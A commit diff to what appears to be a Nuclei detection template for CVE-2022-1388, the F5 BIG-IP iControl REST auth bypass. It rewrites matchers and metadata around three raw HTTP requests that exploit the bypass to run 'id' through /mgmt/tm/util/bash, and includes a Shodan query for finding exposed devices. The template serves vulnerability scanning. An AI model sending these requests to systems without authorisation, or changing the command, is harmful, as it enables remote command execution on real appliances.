Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes.

2022-05-10 17:07:09 -04:00 · 2022-05-10 17:07:09 -04:00 · 0ba6ee3411
parent 152f1d33be
commit 0ba6ee3411
1 changed files with 36 additions and 14 deletions
--- a/cves/2022/CVE-2022-1388.yaml
+++ b/cves/2022/CVE-2022-1388.yaml
@ -1,18 +1,17 @@
 id: CVE-2022-1388

 info:
-  name: F5 BIG-IP iControl REST Auth Bypass RCE
+  name: F5 BIG-IP iControl - REST Auth Bypass RCE
  author: dwisiswant0,Ph33r
  severity: critical
  description: |
-    This vulnerability may allow an unauthenticated attacker
+    This F5 BIG-IP vulnerability can allow an unauthenticated attacker
    with network access to the BIG-IP system through the management
-    port and/or self IP addresses to execute arbitrary system commands,
-    create or delete files, or disable services. There is no data plane
-    exposure; this is a control plane issue only.
+    port and/or self IP addresses to execute arbitrary system commands.
  reference:
    - https://twitter.com/GossiTheDog/status/1523566937414193153
    - https://support.f5.com/csp/article/K23605346
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
@ -21,63 +20,86 @@ info:
  metadata:
    shodan-query: http.title:"BIG-IP&reg;-+Redirect" +"Server"
    verified: true
-  tags: bigip,cve,cve2022,rce,mirai
+  tags: f5,bigip,cve,cve2022,rce,mirai

 variables:
  auth: "admin:"

 requests:
  - raw:
-      - |
+      - |+
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json
+
        {
-          "command": "run",
-          "utilCmdArgs": "-c id"
+             "command": "run",
+             "utilCmdArgs": "-c id"
        }
+
+    matchers-condition: and
    matchers:
      - type: word
        words:
-          - "commandResult"
          - "uid="
        condition: and
+      - type: word
+        words:
+          - "context=system_u"
+          - "commandResult"
+        condition: or
+
  - raw:
-      - |
+      - |+
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: localhost
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json
+
        {
          "command": "run",
          "utilCmdArgs": "-c id"
        }
+
+    matchers-condition: and
    matchers:
      - type: word
        words:
-          - "commandResult"
          - "uid="
        condition: and
+      - type: word
+        words:
+          - "context=system_u"
+          - "commandResult"
+        condition: or
+
  - raw:
-      - |
+      - |+
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: localhost:8100
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json
+
        {
          "command": "run",
          "utilCmdArgs": "-c id"
        }
+
+    matchers-condition: and
    matchers:
      - type: word
        words:
-          - "commandResult"
          - "uid="
        condition: and
+      - type: word
+        words:
+          - "context=system_u"
+          - "commandResult"
+        condition: or